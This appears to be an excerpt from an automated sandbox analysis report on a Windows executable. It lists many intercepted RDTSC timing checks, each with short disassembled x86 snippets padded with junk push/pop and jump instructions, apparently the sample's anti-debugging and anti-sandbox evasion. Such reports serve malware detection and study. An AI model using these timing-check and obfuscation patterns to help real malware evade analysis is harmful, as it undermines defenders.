Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C56548 second address: C56567 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4D46D40B6h 0x00000008 jnp 00007FF4D46D40B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FF4D46D40BBh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C56810 second address: C56814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C56814 second address: C5682D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5682D second address: C56833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C56C82 second address: C56C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F1F8 second address: C5F201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F201 second address: C5F207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F33F second address: C5F343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F343 second address: C5F367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FF4D46D40CCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F367 second address: C5F371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF4D529DDE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F371 second address: C5F37F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF4D46D40BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5F97C second address: C5F980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5FB1C second address: C5FB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FF4D46D40B6h 0x0000000c jg 00007FF4D46D40B6h 0x00000012 jnc 00007FF4D46D40B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5FC9C second address: C5FD0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEAh 0x00000007 jmp 00007FF4D529DDF6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FF4D529DDE8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edx 0x00000017 pushad 0x00000018 jmp 00007FF4D529DDF0h 0x0000001d push eax 0x0000001e js 00007FF4D529DDE6h 0x00000024 jmp 00007FF4D529DDF3h 0x00000029 pop eax 0x0000002a jmp 00007FF4D529DDF2h 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BDF756 second address: BDF761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF4D46D40B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BDF761 second address: BDF794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF0h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF4D529DDE6h 0x0000000f jmp 00007FF4D529DDF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C605AC second address: C605B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C605B2 second address: C605BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C5ED66 second address: C5ED79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE9B6E second address: BE9BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF4D529DDECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF4D529DDF7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FF4D529DDEEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6855B second address: C6855F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67334 second address: C67358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D529DDF9h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C211F7 second address: C21256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF4D46D40B6h 0x0000000a popad 0x0000000b jmp 00007FF4D46D40C6h 0x00000010 popad 0x00000011 add dword ptr [esp], 4652FB63h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FF4D46D40B8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D3369h], esi 0x00000038 push 865B4D30h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21256 second address: C2126D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2138E second address: C21398 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21398 second address: C213D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FF4D529DDE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 movzx edx, si 0x00000014 nop 0x00000015 jc 00007FF4D529DDFFh 0x0000001b jmp 00007FF4D529DDF9h 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C213D2 second address: C213DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2167A second address: C216F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4D529DDF7h 0x0000000b popad 0x0000000c nop 0x0000000d and edi, dword ptr [ebp+122D1B9Ah] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF4D529DDE8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007FF4D529DDF9h 0x00000034 nop 0x00000035 push edi 0x00000036 jne 00007FF4D529DDE8h 0x0000003c pop edi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jno 00007FF4D529DDE6h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C216F0 second address: C216F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C219DD second address: C21A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF4D529DDEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FF4D529DDE8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 0000001Eh 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FF4D529DDE8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 movsx edx, di 0x00000049 nop 0x0000004a push ecx 0x0000004b jmp 00007FF4D529DDF3h 0x00000050 pop ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jns 00007FF4D529DDF1h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21A64 second address: C21A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21A6A second address: C21A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21CE2 second address: C21CEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF4D46D40BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21CEC second address: C21D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jno 00007FF4D529DDECh 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 js 00007FF4D529DDF4h 0x0000001e push eax 0x0000001f push edx 0x00000020 jnp 00007FF4D529DDE6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21D89 second address: C21D8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C21D8E second address: C21DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D529DDF7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67653 second address: C67657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67657 second address: C6765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6765D second address: C67663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67663 second address: C67668 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67668 second address: C67676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF4D46D40B6h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67C61 second address: C67C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF4D529DDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67C6D second address: C67C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF4D46D40B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67C77 second address: C67CB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF4D529DDF2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF4D529DDEEh 0x00000016 jmp 00007FF4D529DDF2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67CB3 second address: C67CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D46D40C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67E5D second address: C67E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67FAA second address: C67FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C67FB0 second address: C67FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6EBB8 second address: C6EBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF4D46D40B6h 0x0000000a popad 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6EBC9 second address: C6EBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF4D529DDF6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6EBE5 second address: C6EBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6EBE9 second address: C6EBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6D95B second address: C6D96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D46D40BBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6D96C second address: C6D9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jng 00007FF4D529DDE6h 0x00000015 jno 00007FF4D529DDE6h 0x0000001b popad 0x0000001c jne 00007FF4D529DDE8h 0x00000022 pushad 0x00000023 jmp 00007FF4D529DDF2h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6DC3F second address: C6DC80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007FF4D46D40B6h 0x00000009 jmp 00007FF4D46D40C3h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FF4D46D40CCh 0x00000019 jmp 00007FF4D46D40C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6DC80 second address: C6DC8A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF4D529DDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6E885 second address: C6E88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6E88F second address: C6E895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C6E895 second address: C6E8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF4D46D40B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C71D13 second address: C71D21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF4D529DDECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C79DAA second address: C79DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D46D40C5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C79DC5 second address: C79DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C7A073 second address: C7A077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C7D2BA second address: C7D2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C7D2BE second address: C7D2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF4D46D40B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8216F second address: C82173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C82173 second address: C82179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C826EC second address: C826F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C83262 second address: C83278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C83278 second address: C8328E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8328E second address: C83294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C83294 second address: C83298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C83298 second address: C832AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FF4D46D40BEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C832AE second address: C832BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDECh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8ABA9 second address: C8ABAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8AD29 second address: C8AD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnc 00007FF4D529DDFEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8AFE8 second address: C8AFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8AFF4 second address: C8B001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FF4D529DDE6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8B001 second address: C8B007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8B843 second address: C8B857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8BDA6 second address: C8BDAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8BDAA second address: C8BDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8BDB2 second address: C8BDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF4D46D40B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8C09C second address: C8C0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8C0A0 second address: C8C0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8C684 second address: C8C69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF4D529DDE6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jne 00007FF4D529DDF2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C8C69D second address: C8C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9156B second address: C91589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
